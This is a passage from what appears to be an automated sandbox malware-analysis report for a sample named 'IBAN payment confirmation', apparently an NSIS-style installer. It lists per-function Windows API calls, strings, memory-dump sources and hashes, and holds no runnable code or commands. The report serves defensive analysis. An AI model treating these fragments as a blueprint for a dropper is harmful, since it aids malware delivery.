                                                                                                                              • Instruction ID: ada95b61e8ad34ac3bb2ad29be3e5f3f7733698153a8948b25f67961a2a4c07b
                                                                                                                              • Opcode Fuzzy Hash: 91a0cc9b62795f3a8a15dda2708214bc4454f5c9052d466bcbd9eea0ad329b5b
                                                                                                                              • Instruction Fuzzy Hash: 2E113D7190400CFEEF21AF90DE89DAE3B79EB54348F10447AFA05B10A0D3759E51EA69
                                                                                                                              APIs
                                                                                                                              • GetDlgItem.USER32(?,?), ref: 00401CEB
                                                                                                                              • GetClientRect.USER32(00000000,?), ref: 00401CF8
                                                                                                                              • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
                                                                                                                              • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
                                                                                                                              • DeleteObject.GDI32(00000000), ref: 00401D36
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2504128483.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 0000000B.00000002.2504077604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504164219.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504235398.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1849352358-0
                                                                                                                              • Opcode ID: 548b7988845d34974c7096401ec02f3577b62e53f99ad47469e6fcf51543f742
                                                                                                                              • Instruction ID: 62a37a396924b9b833916b179176740e0848b2f5cedec3081aefe4e9105dc113
                                                                                                                              • Opcode Fuzzy Hash: 548b7988845d34974c7096401ec02f3577b62e53f99ad47469e6fcf51543f742
                                                                                                                              • Instruction Fuzzy Hash: F0F0E1B2A04104BFDB01DBE4EE88DEEB7BCEB08305B104466F601F5190C674AD018B35
                                                                                                                              APIs
                                                                                                                              • GetDC.USER32(?), ref: 00401D44
                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
                                                                                                                              • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
                                                                                                                              • ReleaseDC.USER32(?,00000000), ref: 00401D71
                                                                                                                              • CreateFontIndirectW.GDI32(0040BD88), ref: 00401DBC
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2504128483.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 0000000B.00000002.2504077604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504164219.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504235398.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3808545654-0
                                                                                                                              • Opcode ID: 6de236fac86f4cc62a0a7bf8fa179f1b370f6b686e9a3dedb6aaee9d500d3606
                                                                                                                              • Instruction ID: 3b80acf522b7bf2f021413e8febbbf72b8f641a50adb0d53ac9f1aa9edf06097
                                                                                                                              • Opcode Fuzzy Hash: 6de236fac86f4cc62a0a7bf8fa179f1b370f6b686e9a3dedb6aaee9d500d3606
                                                                                                                              • Instruction Fuzzy Hash: DF01D131948280AFEB016BB0AE0BB9ABF74DF95301F144479F245B62E2C77914049F7E
                                                                                                                              APIs
                                                                                                                              • SetFilePointer.KERNEL32(00409230,00000000,00000000,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000,00409230,?), ref: 00403088
                                                                                                                              • WriteFile.KERNEL32(00000000,00413E78,?,000000FF,00000000,00413E78,00004000,00409230,00409230,00000004,00000004,00000000,00000000,?,?), ref: 00403115
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2504128483.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 0000000B.00000002.2504077604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504164219.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504235398.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: File$PointerWrite
                                                                                                                              • String ID: x>A
                                                                                                                              • API String ID: 539440098-3854404225
                                                                                                                              • Opcode ID: b27c88111c9479bfc016d655c0b2bfb1ccfb1f1bf46317cd24110ceb5cc412c0
                                                                                                                              • Instruction ID: dc2c699ff297b31fb9e84695071232237a0836a1395088a2783af72dccbdbb3b
                                                                                                                              • Opcode Fuzzy Hash: b27c88111c9479bfc016d655c0b2bfb1ccfb1f1bf46317cd24110ceb5cc412c0
                                                                                                                              • Instruction Fuzzy Hash: A8312871500219EBDF10CF65EC44AAA3FBCEB08755F20813AF905AA1A0D3349E50DBA9
                                                                                                                              APIs
                                                                                                                              • lstrlenW.KERNEL32(004226D0,004226D0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,0000040F,00000400,00000000), ref: 00404A09
                                                                                                                              • wsprintfW.USER32 ref: 00404A12
                                                                                                                              • SetDlgItemTextW.USER32(?,004226D0), ref: 00404A25
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2504128483.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 0000000B.00000002.2504077604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504164219.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504235398.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ItemTextlstrlenwsprintf
                                                                                                                              • String ID: %u.%u%s%s
                                                                                                                              • API String ID: 3540041739-3551169577
                                                                                                                              • Opcode ID: a87d65089fa2b22b88f3ea6921d71f9a407986b65cfb91be1df2eb5324c2a4fc
                                                                                                                              • Instruction ID: 6b2e2e184c3c611d12d6b53aa9198873543b26f6782fca7c8cbe4a2e3a07221a
                                                                                                                              • Opcode Fuzzy Hash: a87d65089fa2b22b88f3ea6921d71f9a407986b65cfb91be1df2eb5324c2a4fc
                                                                                                                              • Instruction Fuzzy Hash: 1411E2736001243BCB10A66D9C45EEF368D9BC6334F180637FA29F61D1DA799C2186EC
                                                                                                                              APIs
                                                                                                                              • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                                                                                              • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2504128483.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 0000000B.00000002.2504077604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504164219.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504235398.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend$Timeout
                                                                                                                              • String ID: !
                                                                                                                              • API String ID: 1777923405-2657877971
                                                                                                                              • Opcode ID: 5e1f230eecded0db815b532ef795033685ed3b5cfc855201c3a552c7fdd4c815
                                                                                                                              • Instruction ID: 3450dd174e4bd499bd5dd80d9ee349d4783428bbf063aee010979b0fef1ae38f
                                                                                                                              • Opcode Fuzzy Hash: 5e1f230eecded0db815b532ef795033685ed3b5cfc855201c3a552c7fdd4c815
                                                                                                                              • Instruction Fuzzy Hash: D8217471A44109BEEF019FB0C94AFAD7B75EF44748F20413AF502B61D1D6B8A941DB18
                                                                                                                              APIs
                                                                                                                              • RegCreateKeyExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236F
                                                                                                                              • lstrlenW.KERNEL32(0040A580,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238F
                                                                                                                              • RegSetValueExW.ADVAPI32(?,?,?,?,0040A580,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023CB
                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,0040A580,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2504128483.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 0000000B.00000002.2504077604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504164219.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504235398.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseCreateValuelstrlen
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1356686001-0
                                                                                                                              • Opcode ID: a8bbc55d30affaabc6cd86b2271235a8e32791a35e6a6594074806b6736fc700
                                                                                                                              • Instruction ID: 3600ae87f41ed0761c30afac485ceb57641edc98565fd21ac0e2bbddf966c716
                                                                                                                              • Opcode Fuzzy Hash: a8bbc55d30affaabc6cd86b2271235a8e32791a35e6a6594074806b6736fc700
                                                                                                                              • Instruction Fuzzy Hash: 511160B1A00108BEEB10AFA4DD49EAFBB7CEB50358F10443AF905B61D1D7B85D419B69
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 004059E0: CharNextW.USER32(?,?,00424ED8,?,00405A54,00424ED8,00424ED8,00436800,?,771B2EE0,00405792,?,00436800,771B2EE0,00434000), ref: 004059EE
                                                                                                                                • Part of subcall function 004059E0: CharNextW.USER32(00000000), ref: 004059F3
                                                                                                                                • Part of subcall function 004059E0: CharNextW.USER32(00000000), ref: 00405A0B
                                                                                                                              • CreateDirectoryW.KERNEL32(?,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
                                                                                                                              • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
                                                                                                                              • GetFileAttributesW.KERNEL32(?,?,00000000,0000005C,00000000,000000F0), ref: 004015FD
                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?,00435000,?,00000000,000000F0), ref: 00401630
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2504128483.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 0000000B.00000002.2504077604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504164219.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504235398.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3751793516-0
                                                                                                                              • Opcode ID: ab4beae8261b44de63f604e0a73f5b1755ddd155d8cc8e63c414e47e0b3a8ad9
                                                                                                                              • Instruction ID: 793db7a5d63411832aed35bcc9698a3b838560232fc9f0aff2bd133e4d1ca9b1
                                                                                                                              • Opcode Fuzzy Hash: ab4beae8261b44de63f604e0a73f5b1755ddd155d8cc8e63c414e47e0b3a8ad9
                                                                                                                              • Instruction Fuzzy Hash: 8E11C271904100EBDF206FA0CD449AF7AB4FF14369B34463BF882B62E1D23D4941DA6E
                                                                                                                              APIs
                                                                                                                              • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
                                                                                                                              • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F39
                                                                                                                              • GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
                                                                                                                              • VerQueryValueW.VERSION(?,00409014,?,?,?,?,00000000,00000000), ref: 00401F69
                                                                                                                                • Part of subcall function 00405E31: wsprintfW.USER32 ref: 00405E3E
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2504128483.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 0000000B.00000002.2504077604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504164219.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504235398.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1404258612-0
                                                                                                                              • Opcode ID: 0759821644e88925b44a7e9fb1563554894f113fe06b33f49c2a0c28299a5465
                                                                                                                              • Instruction ID: 0d64a3d5d22a86ce83a9b45ae5cd800923300da454a86426803db7941f711343
                                                                                                                              • Opcode Fuzzy Hash: 0759821644e88925b44a7e9fb1563554894f113fe06b33f49c2a0c28299a5465
                                                                                                                              • Instruction Fuzzy Hash: 76113675A00208AFDB00DFA5C945DAEBBB9EF04344F20407AF905F62A1D7349E50CB68
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00405194: lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 004051CC
                                                                                                                                • Part of subcall function 00405194: lstrlenW.KERNEL32(00402D94,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 004051DC
                                                                                                                                • Part of subcall function 00405194: lstrcatW.KERNEL32(004216B0,00402D94,00402D94,004216B0,00000000,00000000,00000000), ref: 004051EF
                                                                                                                                • Part of subcall function 00405194: SetWindowTextW.USER32(004216B0,004216B0), ref: 00405201
                                                                                                                                • Part of subcall function 00405194: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405227
                                                                                                                                • Part of subcall function 00405194: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405241
                                                                                                                                • Part of subcall function 00405194: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524F
                                                                                                                                • Part of subcall function 00405665: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256D8,Error launching installer), ref: 0040568A
                                                                                                                                • Part of subcall function 00405665: CloseHandle.KERNEL32(?), ref: 00405697
                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E80
                                                                                                                              • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401E95
                                                                                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
                                                                                                                              • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2504128483.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 0000000B.00000002.2504077604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504164219.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504235398.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3585118688-0
                                                                                                                              • Opcode ID: d15ae0a482c79c0d8e7c95f8c2190dddee124483964ec219d5696f0573d40edc
                                                                                                                              • Instruction ID: 1710045f99402437403c6baccff52884d9c8abed8acdccfc98223cb8aca5cd2d
                                                                                                                              • Opcode Fuzzy Hash: d15ae0a482c79c0d8e7c95f8c2190dddee124483964ec219d5696f0573d40edc
                                                                                                                              • Instruction Fuzzy Hash: DC11A171D04204EBCF109FA0CD459DE7AB5EB04318F20447BE505B61E0C3798A82DF99
                                                                                                                              APIs
                                                                                                                              • IsWindowVisible.USER32(?), ref: 00405137
                                                                                                                              • CallWindowProcW.USER32(?,?,?,?), ref: 00405188
                                                                                                                                • Part of subcall function 0040417B: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040418D
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2504128483.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 0000000B.00000002.2504077604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504164219.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504235398.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$CallMessageProcSendVisible
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3748168415-3916222277
                                                                                                                              • Opcode ID: ffbbbef4bb215af9c79ac16ecb942473111b8a896db240ad95dfeee9b4123394
                                                                                                                              • Instruction ID: e96fcdb8fef6e8ad8397e3324e9c6cbe2a99463e9dbc89d2689884753c01e048
                                                                                                                              • Opcode Fuzzy Hash: ffbbbef4bb215af9c79ac16ecb942473111b8a896db240ad95dfeee9b4123394
                                                                                                                              • Instruction Fuzzy Hash: 9C019E71A00608AFDF215F11DD84FAB3A26EB84354F104136FA007E2E0C37A8C929E69
                                                                                                                              APIs
                                                                                                                              • GetTickCount.KERNEL32 ref: 00405BA3
                                                                                                                              • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00000000,00403358,00436000,00436800), ref: 00405BBE
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2504128483.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 0000000B.00000002.2504077604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504164219.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504235398.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CountFileNameTempTick
                                                                                                                              • String ID: nsa
                                                                                                                              • API String ID: 1716503409-2209301699
                                                                                                                              • Opcode ID: 7054b5fb0d700673de611bc5c70211d8803a17d96c063a26fac21c3c19acc14a
                                                                                                                              • Instruction ID: ce32066b90f2dd5c00c4c21114408b385ae8a9c1cc04399698be8057c3d71d7e
                                                                                                                              • Opcode Fuzzy Hash: 7054b5fb0d700673de611bc5c70211d8803a17d96c063a26fac21c3c19acc14a
                                                                                                                              • Instruction Fuzzy Hash: B7F09676A00204BBDB008F59DC05F9BB7B9EB91710F10803AE901F7180E2B0BD40CB64
                                                                                                                              APIs
                                                                                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256D8,Error launching installer), ref: 0040568A
                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00405697
                                                                                                                              Strings
                                                                                                                              • Error launching installer, xrefs: 00405678
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2504128483.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 0000000B.00000002.2504077604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504164219.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504235398.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseCreateHandleProcess
                                                                                                                              • String ID: Error launching installer
                                                                                                                              • API String ID: 3712363035-66219284
                                                                                                                              • Opcode ID: db986bb620d03a990efffdf1bf116708606012bbbe4d85f78c6f80e4c395a8cb
                                                                                                                              • Instruction ID: c7c859a2db999ab7639828e98f3e535764a8332e37e79a8a612d2f3195062982
                                                                                                                              • Opcode Fuzzy Hash: db986bb620d03a990efffdf1bf116708606012bbbe4d85f78c6f80e4c395a8cb
                                                                                                                              • Instruction Fuzzy Hash: 19E0ECB4A01209AFEB009F64EC49A6B7BBCEB00744B908921A914F2250D778E8108A7D
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2504128483.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 0000000B.00000002.2504077604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504164219.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504235398.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: fe49718026384e2f2d8d8d283f1539e894bec1c05f027991fc18b2b3d3b0abdf
                                                                                                                              • Instruction ID: 0bcb7f2cf841bf472a0df6abca0e2eee6c891e9108e2cead3d2ea24e9771fd10
                                                                                                                              • Opcode Fuzzy Hash: fe49718026384e2f2d8d8d283f1539e894bec1c05f027991fc18b2b3d3b0abdf
                                                                                                                              • Instruction Fuzzy Hash: D6A15671E00229CBDF28CFA8C854BADBBB1FF44305F15816AD856BB281C7785A96DF44
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2504128483.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 0000000B.00000002.2504077604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504164219.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504235398.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
